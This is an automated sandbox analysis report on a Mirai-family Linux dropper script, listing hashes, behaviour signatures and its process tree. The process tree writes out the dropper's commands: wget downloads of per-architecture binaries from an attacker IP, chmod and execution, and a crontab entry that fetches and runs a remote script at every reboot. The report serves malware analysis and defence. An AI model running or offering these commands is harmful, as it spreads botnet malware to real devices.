Analysis
-
max time kernel
138s -
max time network
146s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
09-11-2024 08:41
Static task
static1
Behavioral task
behavioral1
Sample
l.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
l.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
l.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
l.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
l.sh
-
Size
916B
-
MD5
19c4fe1b103747e55af818fc3f07fdbe
-
SHA1
ccb4350c6ce8bb9449a9dc5dfa4910762d1d9fe8
-
SHA256
7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
-
SHA512
2d3f697da5886721e51cbc720a77c9c755027d361a7e139de80be1ee5c2dd1c76a20d3c33fb32177a5318400fbec36555c93cd9b860e398b5b1fd73e3c5fa270
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 27 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodshchmodshshchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 1775 chmod 1785 chmod 1812 sh 1711 chmod 1723 sh 1768 sh 1701 chmod 1706 chmod 1810 chmod 1691 chmod 1731 chmod 1795 chmod 1696 chmod 1716 chmod 1780 chmod 1721 chmod 1741 chmod 1756 chmod 1761 chmod 1790 chmod 1686 chmod 1746 chmod 1800 chmod 1805 chmod 1736 chmod 1751 chmod 1766 chmod -
Executes dropped EXE 24 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerioc pid process /tmp/lib/dvrLocker 1687 dvrLocker /tmp/lib/dvrLocker 1692 dvrLocker /tmp/lib/dvrLocker 1697 dvrLocker /tmp/lib/dvrLocker 1702 dvrLocker /tmp/lib/dvrLocker 1707 dvrLocker /tmp/lib/dvrLocker 1712 dvrLocker /tmp/lib/dvrLocker 1717 dvrLocker /tmp/lib/dvrLocker 1722 dvrLocker /mnt/dvrLocker 1732 dvrLocker /mnt/dvrLocker 1737 dvrLocker /mnt/dvrLocker 1742 dvrLocker /mnt/dvrLocker 1747 dvrLocker /mnt/dvrLocker 1752 dvrLocker /mnt/dvrLocker 1757 dvrLocker /mnt/dvrLocker 1762 dvrLocker /mnt/dvrLocker 1767 dvrLocker /mnt/dvrLocker 1776 dvrLocker /mnt/dvrLocker 1781 dvrLocker /mnt/dvrLocker 1786 dvrLocker /mnt/dvrLocker 1791 dvrLocker /mnt/dvrLocker 1796 dvrLocker /mnt/dvrLocker 1801 dvrLocker /mnt/dvrLocker 1806 dvrLocker /mnt/dvrLocker 1811 dvrLocker -
Renames itself 3 IoCs
Processes:
dvrLockerdvrLockerdvrLockerpid process 1722 dvrLocker 1767 dvrLocker 1811 dvrLocker -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 5.161.109.23 Destination IP 202.61.197.122 Destination IP 64.176.6.48 -
Creates/modifies Cron job 1 TTPs 3 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabcrontabcrontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.kwgToV crontab File opened for modification /var/spool/cron/crontabs/tmp.jeG6xK crontab File opened for modification /var/spool/cron/crontabs/tmp.k7lYiR crontab -
Changes its process name 3 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdescription ioc pid process Changes the process name, possibly in an attempt to hide itself [kswapd0] 1722 dvrLocker Changes the process name, possibly in an attempt to hide itself mini_httpd 1767 dvrLocker Changes the process name, possibly in an attempt to hide itself [kswapd0] 1811 dvrLocker -
Processes:
lslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslsdescription ioc process File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetrmwgetrmwgetrmpid process 1690 wget 1694 rm 1735 wget 1739 rm 1779 wget 1783 rm -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
l.shdescription ioc process File opened for modification /tmp/lib/dvrLocker l.sh
Processes
-
/tmp/l.sh/tmp/l.sh1⤵
- Writes file to tmp directory
PID:1509 -
/bin/lsls -l /proc/1/exe2⤵
- Reads runtime system information
PID:1510 -
/bin/lsls -l /proc/10/exe2⤵
- Reads runtime system information
PID:1511 -
/bin/lsls -l /proc/1017/exe2⤵
- Reads runtime system information
PID:1512 -
/bin/lsls -l /proc/1022/exe2⤵
- Reads runtime system information
PID:1513 -
/bin/lsls -l /proc/1036/exe2⤵
- Reads runtime system information
PID:1514 -
/bin/lsls -l /proc/1042/exe2⤵
- Reads runtime system information
PID:1515 -
/bin/lsls -l /proc/1056/exe2⤵
- Reads runtime system information
PID:1516 -
/bin/lsls -l /proc/1060/exe2⤵PID:1517
-
/bin/lsls -l /proc/1063/exe2⤵
- Reads runtime system information
PID:1518 -
/bin/lsls -l /proc/1066/exe2⤵PID:1519
-
/bin/lsls -l /proc/1070/exe2⤵
- Reads runtime system information
PID:1520 -
/bin/lsls -l /proc/1080/exe2⤵
- Reads runtime system information
PID:1521 -
/bin/lsls -l /proc/1084/exe2⤵PID:1522
-
/bin/lsls -l /proc/1093/exe2⤵
- Reads runtime system information
PID:1523 -
/bin/lsls -l /proc/11/exe2⤵PID:1524
-
/bin/lsls -l /proc/1108/exe2⤵PID:1525
-
/bin/lsls -l /proc/1113/exe2⤵
- Reads runtime system information
PID:1526 -
/bin/lsls -l /proc/1117/exe2⤵
- Reads runtime system information
PID:1527 -
/bin/lsls -l /proc/1121/exe2⤵PID:1528
-
/bin/lsls -l /proc/1125/exe2⤵PID:1529
-
/bin/lsls -l /proc/1129/exe2⤵PID:1530
-
/bin/lsls -l /proc/1133/exe2⤵PID:1531
-
/bin/lsls -l /proc/1138/exe2⤵PID:1532
-
/bin/lsls -l /proc/1142/exe2⤵PID:1533
-
/bin/lsls -l /proc/1143/exe2⤵PID:1534
-
/bin/lsls -l /proc/1146/exe2⤵PID:1535
-
/bin/lsls -l /proc/1149/exe2⤵
- Reads runtime system information
PID:1536 -
/bin/lsls -l /proc/115/exe2⤵PID:1537
-
/bin/lsls -l /proc/1151/exe2⤵PID:1538
-
/bin/lsls -l /proc/1161/exe2⤵PID:1539
-
/bin/lsls -l /proc/1163/exe2⤵
- Reads runtime system information
PID:1540 -
/bin/lsls -l /proc/1165/exe2⤵
- Reads runtime system information
PID:1541 -
/bin/lsls -l /proc/1166/exe2⤵PID:1542
-
/bin/lsls -l /proc/1171/exe2⤵PID:1543
-
/bin/lsls -l /proc/1179/exe2⤵
- Reads runtime system information
PID:1544 -
/bin/lsls -l /proc/1182/exe2⤵PID:1548
-
/bin/lsls -l /proc/1183/exe2⤵PID:1549
-
/bin/lsls -l /proc/1184/exe2⤵PID:1550
-
/bin/lsls -l /proc/1185/exe2⤵
- Reads runtime system information
PID:1551 -
/bin/lsls -l /proc/1188/exe2⤵PID:1552
-
/bin/lsls -l /proc/1191/exe2⤵PID:1553
-
/bin/lsls -l /proc/12/exe2⤵PID:1554
-
/bin/lsls -l /proc/1226/exe2⤵PID:1555
-
/bin/lsls -l /proc/1228/exe2⤵PID:1556
-
/bin/lsls -l /proc/1255/exe2⤵PID:1557
-
/bin/lsls -l /proc/1256/exe2⤵PID:1558
-
/bin/lsls -l /proc/1269/exe2⤵PID:1559
-
/bin/lsls -l /proc/1282/exe2⤵PID:1560
-
/bin/lsls -l /proc/1287/exe2⤵PID:1561
-
/bin/lsls -l /proc/1297/exe2⤵PID:1562
-
/bin/lsls -l /proc/13/exe2⤵PID:1563
-
/bin/lsls -l /proc/1308/exe2⤵PID:1564
-
/bin/lsls -l /proc/1313/exe2⤵
- Reads runtime system information
PID:1565 -
/bin/lsls -l /proc/1317/exe2⤵
- Reads runtime system information
PID:1566 -
/bin/lsls -l /proc/1339/exe2⤵PID:1567
-
/bin/lsls -l /proc/1349/exe2⤵
- Reads runtime system information
PID:1568 -
/bin/lsls -l /proc/137/exe2⤵
- Reads runtime system information
PID:1569 -
/bin/lsls -l /proc/1379/exe2⤵PID:1570
-
/bin/lsls -l /proc/14/exe2⤵
- Reads runtime system information
PID:1571 -
/bin/lsls -l /proc/1478/exe2⤵
- Reads runtime system information
PID:1572 -
/bin/lsls -l /proc/1497/exe2⤵PID:1573
-
/bin/lsls -l /proc/15/exe2⤵PID:1574
-
/bin/lsls -l /proc/1503/exe2⤵
- Reads runtime system information
PID:1575 -
/bin/lsls -l /proc/1505/exe2⤵
- Reads runtime system information
PID:1576 -
/bin/lsls -l /proc/1506/exe2⤵PID:1577
-
/bin/lsls -l /proc/1507/exe2⤵PID:1578
-
/bin/lsls -l /proc/1509/exe2⤵
- Reads runtime system information
PID:1579 -
/bin/lsls -l /proc/159/exe2⤵PID:1580
-
/bin/lsls -l /proc/16/exe2⤵
- Reads runtime system information
PID:1581 -
/bin/lsls -l /proc/160/exe2⤵
- Reads runtime system information
PID:1582 -
/bin/lsls -l /proc/161/exe2⤵PID:1583
-
/bin/lsls -l /proc/162/exe2⤵PID:1584
-
/bin/lsls -l /proc/163/exe2⤵PID:1585
-
/bin/lsls -l /proc/164/exe2⤵PID:1586
-
/bin/lsls -l /proc/165/exe2⤵
- Reads runtime system information
PID:1587 -
/bin/lsls -l /proc/166/exe2⤵PID:1588
-
/bin/lsls -l /proc/167/exe2⤵
- Reads runtime system information
PID:1589 -
/bin/lsls -l /proc/168/exe2⤵PID:1590
-
/bin/lsls -l /proc/169/exe2⤵PID:1591
-
/bin/lsls -l /proc/17/exe2⤵PID:1592
-
/bin/lsls -l /proc/170/exe2⤵
- Reads runtime system information
PID:1593 -
/bin/lsls -l /proc/171/exe2⤵PID:1594
-
/bin/lsls -l /proc/172/exe2⤵PID:1595
-
/bin/lsls -l /proc/173/exe2⤵
- Reads runtime system information
PID:1596 -
/bin/lsls -l /proc/174/exe2⤵
- Reads runtime system information
PID:1597 -
/bin/lsls -l /proc/175/exe2⤵PID:1598
-
/bin/lsls -l /proc/176/exe2⤵
- Reads runtime system information
PID:1599 -
/bin/lsls -l /proc/178/exe2⤵PID:1600
-
/bin/lsls -l /proc/18/exe2⤵PID:1601
-
/bin/lsls -l /proc/19/exe2⤵PID:1602
-
/bin/lsls -l /proc/2/exe2⤵
- Reads runtime system information
PID:1603 -
/bin/lsls -l /proc/20/exe2⤵
- Reads runtime system information
PID:1604 -
/bin/lsls -l /proc/203/exe2⤵
- Reads runtime system information
PID:1605 -
/bin/lsls -l /proc/204/exe2⤵PID:1606
-
/bin/lsls -l /proc/21/exe2⤵PID:1607
-
/bin/lsls -l /proc/22/exe2⤵PID:1608
-
/bin/lsls -l /proc/23/exe2⤵
- Reads runtime system information
PID:1609 -
/bin/lsls -l /proc/24/exe2⤵PID:1610
-
/bin/lsls -l /proc/244/exe2⤵
- Reads runtime system information
PID:1611 -
/bin/lsls -l /proc/25/exe2⤵PID:1612
-
/bin/lsls -l /proc/26/exe2⤵
- Reads runtime system information
PID:1613 -
/bin/lsls -l /proc/269/exe2⤵PID:1614
-
/bin/lsls -l /proc/27/exe2⤵PID:1615
-
/bin/lsls -l /proc/28/exe2⤵PID:1616
-
/bin/lsls -l /proc/29/exe2⤵PID:1617
-
/bin/lsls -l /proc/3/exe2⤵
- Reads runtime system information
PID:1618 -
/bin/lsls -l /proc/30/exe2⤵PID:1619
-
/bin/lsls -l /proc/309/exe2⤵PID:1620
-
/bin/lsls -l /proc/31/exe2⤵PID:1621
-
/bin/lsls -l /proc/313/exe2⤵PID:1622
-
/bin/lsls -l /proc/32/exe2⤵
- Reads runtime system information
PID:1623 -
/bin/lsls -l /proc/34/exe2⤵
- Reads runtime system information
PID:1624 -
/bin/lsls -l /proc/35/exe2⤵PID:1625
-
/bin/lsls -l /proc/36/exe2⤵
- Reads runtime system information
PID:1626 -
/bin/lsls -l /proc/4/exe2⤵
- Reads runtime system information
PID:1627 -
/bin/lsls -l /proc/405/exe2⤵PID:1628
-
/bin/lsls -l /proc/412/exe2⤵PID:1629
-
/bin/lsls -l /proc/436/exe2⤵PID:1630
-
/bin/lsls -l /proc/443/exe2⤵PID:1631
-
/bin/lsls -l /proc/454/exe2⤵PID:1632
-
/bin/lsls -l /proc/457/exe2⤵PID:1633
-
/bin/lsls -l /proc/463/exe2⤵PID:1634
-
/bin/lsls -l /proc/466/exe2⤵PID:1635
-
/bin/lsls -l /proc/472/exe2⤵
- Reads runtime system information
PID:1636 -
/bin/lsls -l /proc/473/exe2⤵PID:1637
-
/bin/lsls -l /proc/474/exe2⤵
- Reads runtime system information
PID:1638 -
/bin/lsls -l /proc/476/exe2⤵PID:1639
-
/bin/lsls -l /proc/480/exe2⤵PID:1640
-
/bin/lsls -l /proc/484/exe2⤵PID:1641
-
/bin/lsls -l /proc/485/exe2⤵PID:1642
-
/bin/lsls -l /proc/487/exe2⤵
- Reads runtime system information
PID:1643 -
/bin/lsls -l /proc/5/exe2⤵PID:1644
-
/bin/lsls -l /proc/516/exe2⤵PID:1645
-
/bin/lsls -l /proc/523/exe2⤵PID:1646
-
/bin/lsls -l /proc/535/exe2⤵
- Reads runtime system information
PID:1647 -
/bin/lsls -l /proc/542/exe2⤵PID:1648
-
/bin/lsls -l /proc/552/exe2⤵PID:1649
-
/bin/lsls -l /proc/573/exe2⤵
- Reads runtime system information
PID:1650 -
/bin/lsls -l /proc/597/exe2⤵PID:1651
-
/bin/lsls -l /proc/598/exe2⤵PID:1652
-
/bin/lsls -l /proc/6/exe2⤵
- Reads runtime system information
PID:1653 -
/bin/lsls -l /proc/634/exe2⤵PID:1654
-
/bin/lsls -l /proc/648/exe2⤵PID:1655
-
/bin/lsls -l /proc/649/exe2⤵
- Reads runtime system information
PID:1656 -
/bin/lsls -l /proc/651/exe2⤵
- Reads runtime system information
PID:1657 -
/bin/lsls -l /proc/658/exe2⤵PID:1658
-
/bin/lsls -l /proc/670/exe2⤵
- Reads runtime system information
PID:1659 -
/bin/lsls -l /proc/697/exe2⤵PID:1660
-
/bin/lsls -l /proc/7/exe2⤵PID:1661
-
/bin/lsls -l /proc/744/exe2⤵PID:1662
-
/bin/lsls -l /proc/757/exe2⤵
- Reads runtime system information
PID:1663 -
/bin/lsls -l /proc/78/exe2⤵PID:1664
-
/bin/lsls -l /proc/79/exe2⤵
- Reads runtime system information
PID:1665 -
/bin/lsls -l /proc/8/exe2⤵
- Reads runtime system information
PID:1666 -
/bin/lsls -l /proc/80/exe2⤵PID:1667
-
/bin/lsls -l /proc/81/exe2⤵
- Reads runtime system information
PID:1668 -
/bin/lsls -l /proc/82/exe2⤵
- Reads runtime system information
PID:1669 -
/bin/lsls -l /proc/83/exe2⤵
- Reads runtime system information
PID:1670 -
/bin/lsls -l /proc/84/exe2⤵
- Reads runtime system information
PID:1671 -
/bin/lsls -l /proc/85/exe2⤵PID:1672
-
/bin/lsls -l /proc/89/exe2⤵
- Reads runtime system information
PID:1673 -
/bin/lsls -l /proc/895/exe2⤵PID:1674
-
/bin/lsls -l /proc/9/exe2⤵PID:1675
-
/bin/lsls -l /proc/949/exe2⤵PID:1676
-
/bin/lsls -l /proc/950/exe2⤵PID:1677
-
/bin/lsls -l /proc/98/exe2⤵
- Reads runtime system information
PID:1678 -
/bin/lsls -l /proc/985/exe2⤵PID:1679
-
/bin/lsls -l /proc/990/exe2⤵PID:1680
-
/bin/lsls -l /proc/993/exe2⤵PID:1681
-
/bin/rmrm -rf /tmp/lib/2⤵PID:1682
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:1683
-
/bin/mkdirmkdir /tmp/lib/2⤵PID:1684
-
/usr/bin/wgetwget http://45.202.35.91/mpsl -O -2⤵PID:1685
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1686 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1687 -
/bin/rmrm -rf mpsl2⤵PID:1689
-
/usr/bin/wgetwget http://45.202.35.91/mips -O -2⤵
- System Network Configuration Discovery
PID:1690 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1691 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1692 -
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:1694 -
/usr/bin/wgetwget http://45.202.35.91/arm -O -2⤵PID:1695
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1696 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1697 -
/bin/rmrm -rf arm2⤵PID:1699
-
/usr/bin/wgetwget http://45.202.35.91/arm5 -O -2⤵PID:1700
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1701 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1702 -
/bin/rmrm -rf arm52⤵PID:1704
-
/usr/bin/wgetwget http://45.202.35.91/ppc -O -2⤵PID:1705
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1706 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1707 -
/bin/rmrm -rf ppc2⤵PID:1709
-
/usr/bin/wgetwget http://45.202.35.91/arm7 -O -2⤵PID:1710
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1711 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1712 -
/bin/rmrm -rf arm72⤵PID:1714
-
/usr/bin/wgetwget http://45.202.35.91/arm6 -O -2⤵PID:1715
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1716 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1717 -
/bin/rmrm -rf arm62⤵PID:1719
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:1720
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1721 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
PID:1722 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:1723 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1725 -
/usr/bin/crontabcrontab -l4⤵PID:1726
-
/bin/rmrm -rf x862⤵PID:1728
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:1729
-
/usr/bin/wgetwget http://45.202.35.91/mpsl -O -2⤵PID:1730
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1731 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1732 -
/bin/rmrm -rf mpsl2⤵PID:1734
-
/usr/bin/wgetwget http://45.202.35.91/mips -O -2⤵
- System Network Configuration Discovery
PID:1735 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1736 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1737 -
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:1739 -
/usr/bin/wgetwget http://45.202.35.91/arm -O -2⤵PID:1740
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1741 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1742 -
/bin/rmrm -rf arm2⤵PID:1744
-
/usr/bin/wgetwget http://45.202.35.91/arm5 -O -2⤵PID:1745
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1746 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1747 -
/bin/rmrm -rf arm52⤵PID:1749
-
/usr/bin/wgetwget http://45.202.35.91/ppc -O -2⤵PID:1750
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1751 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1752 -
/bin/rmrm -rf ppc2⤵PID:1754
-
/usr/bin/wgetwget http://45.202.35.91/arm7 -O -2⤵PID:1755
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1756 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1757 -
/bin/rmrm -rf arm72⤵PID:1759
-
/usr/bin/wgetwget http://45.202.35.91/arm6 -O -2⤵PID:1760
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1761 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1762 -
/bin/rmrm -rf arm62⤵PID:1764
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:1765
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1766 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
PID:1767 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:1768 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1770 -
/usr/bin/crontabcrontab -l4⤵PID:1771
-
/bin/rmrm -rf x862⤵PID:1773
-
/usr/bin/wgetwget http://45.202.35.91/mpsl -O -2⤵PID:1774
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1775 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1776 -
/bin/rmrm -rf mpsl2⤵PID:1778
-
/usr/bin/wgetwget http://45.202.35.91/mips -O -2⤵
- System Network Configuration Discovery
PID:1779 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1780 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1781 -
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:1783 -
/usr/bin/wgetwget http://45.202.35.91/arm -O -2⤵PID:1784
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1785 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1786 -
/bin/rmrm -rf arm2⤵PID:1788
-
/usr/bin/wgetwget http://45.202.35.91/arm5 -O -2⤵PID:1789
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1790 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1791 -
/bin/rmrm -rf arm52⤵PID:1793
-
/usr/bin/wgetwget http://45.202.35.91/ppc -O -2⤵PID:1794
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1795 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1796 -
/bin/rmrm -rf ppc2⤵PID:1798
-
/usr/bin/wgetwget http://45.202.35.91/arm7 -O -2⤵PID:1799
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1800 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1801 -
/bin/rmrm -rf arm72⤵PID:1803
-
/usr/bin/wgetwget http://45.202.35.91/arm6 -O -2⤵PID:1804
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1805 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1806 -
/bin/rmrm -rf arm62⤵PID:1808
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:1809
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1810 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
PID:1811 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:1812 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1814 -
/usr/bin/crontabcrontab -l4⤵PID:1815
-
/bin/rmrm -rf x862⤵PID:1817
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102KB
MD5b1a1559b205459098f1fff627d35c808
SHA1983f62052375084a8c125353e0c25b7cd19bd369
SHA256e4837942ba2584de61bc3a75eba74f4eb0a137a7807130553c42d470c3ec01da
SHA5123bb8ec38b6f3d17f7c7307785f609031b30056da380377bce27bdd48678cbbc81c4b7203ff511794ec6d23644952a82fa471e13149c014a91378f08305e6f60d
-
Filesize
100KB
MD54ad582d49f505bfab7de84881998685b
SHA15f09f4baed114b594729ded91e2c4d263f0e2754
SHA256b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA5126f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
-
Filesize
99KB
MD5559f129d380ad1cfb60792c6b2dc3d32
SHA13997a0fc0bd5958783f1751364ec407c5b170adc
SHA256fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA5129f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112
-
Filesize
77KB
MD5d09db60a70d5b53b5b53ad39476fd7e8
SHA173a75e5e8200f77d857a7256cc0979077e29241d
SHA25636b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04
-
Filesize
73KB
MD5f812a7b3a877f717eb6e54b843b41848
SHA121ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA2569a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732
-
Filesize
85KB
MD5a016f79253a036ed87dd3ae118767cf2
SHA152c10912a82115af3a6dca21993c223a6e7c669d
SHA25695f180a725b479687bdb9818991a68be75f0ba901c969cc93746e9996c1d0e50
